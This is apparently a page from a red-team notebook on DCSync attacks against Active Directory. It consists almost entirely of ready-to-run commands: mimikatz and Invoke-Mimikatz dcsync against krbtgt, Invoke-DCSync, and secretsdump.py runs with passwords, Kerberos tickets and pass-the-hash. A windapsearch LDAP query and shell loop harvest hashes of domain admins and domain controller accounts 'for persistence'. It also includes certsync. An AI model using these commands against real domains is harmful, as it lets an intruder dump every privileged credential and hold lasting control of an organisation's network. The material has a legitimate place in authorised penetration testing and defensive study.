DCSync

DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
​https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync​
​https://habr.com/ru/company/rvision/blog/709866/​
​https://habr.com/ru/company/rvision/blog/709942/​
Tools
Mimikatz
mimikatz # lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt
mimikatz # lsadump::dcsync /domain:megacorp.local /user:[email protected]
Invoke-Mimikatz
​https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1​
PS > Invoke-Mimikatz -Command '"lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt" "exit"'
Invoke-DCSync.ps1
​https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-DCSync.ps1​
PS > Invoke-DCSync -GetComputers -Domain megacorp.local -DomainController DC1.megacorp.local
DCSyncer
​https://www.notsoshant.io/tools/dcsyncer/​
​https://github.com/notsoshant/DCSyncer​
secretsdump.py
$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@DC1.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
$ secretsdump.py DC1.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
Targeted DCSync
When performing targeted DCSync (e. g., for persistence purposes) choose the most valuable accounts. One can use the following LDAP query to search for effective domain admins (adminCount=1) as well as DC computer accounts (SERVER_TRUST_ACCOUNT bit or userAccountControl=8192 is set):
(&
	(|
		(&(objectCategory=person)(objectClass=user))
		(&(objectCategory=computer)(objectClass=computer))
	)
	(!(userAccountControl:1.2.840.113556.1.4.803:=2))
	(|
		(adminCount=1)
		(userAccountControl:1.2.840.113556.1.4.803:=8192)
	)
)
​
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'DC1$' --hash fc525c9683e8fe067095ba2ddc971889 -m custom --filter '(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(adminCount=1)(userAccountControl:1.2.840.113556.1.4.803:=8192)))' --attrs msDS-PrincipalName | grep msDS | awk '{print $2}' | tee high-value-targets.txt
$ for t in `cat high-value-targets.txt`; do secretsdump.py -pwd-last-set MEGACORP/'DC1$'@192.168.2.22 -hashes :fc525c9683e8fe067095ba2ddc971889 -just-dc-user $t | grep aad3b | tee -a high-value-hashes.txt; done
Or
$ secretsdump.py -pwd-last-set MEGACORP/snovvcrash:'Passw0rd!'@DC1.megacorp.local -dc-ip 192.168.1.11 -ldapfilter '(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(adminCount=1)(userAccountControl:1.2.840.113556.1.4.803:=8192)))' | grep aad3b | tee high-value-hashes.txt
certsync
​https://github.com/zblurx/certsync​
$ certsync -d megacorp.local -u snovvcrash -p 'Passw0rd!' -dc-ip 192.168.1.11 -ns 192.168.1.11
Last modified 6mo ago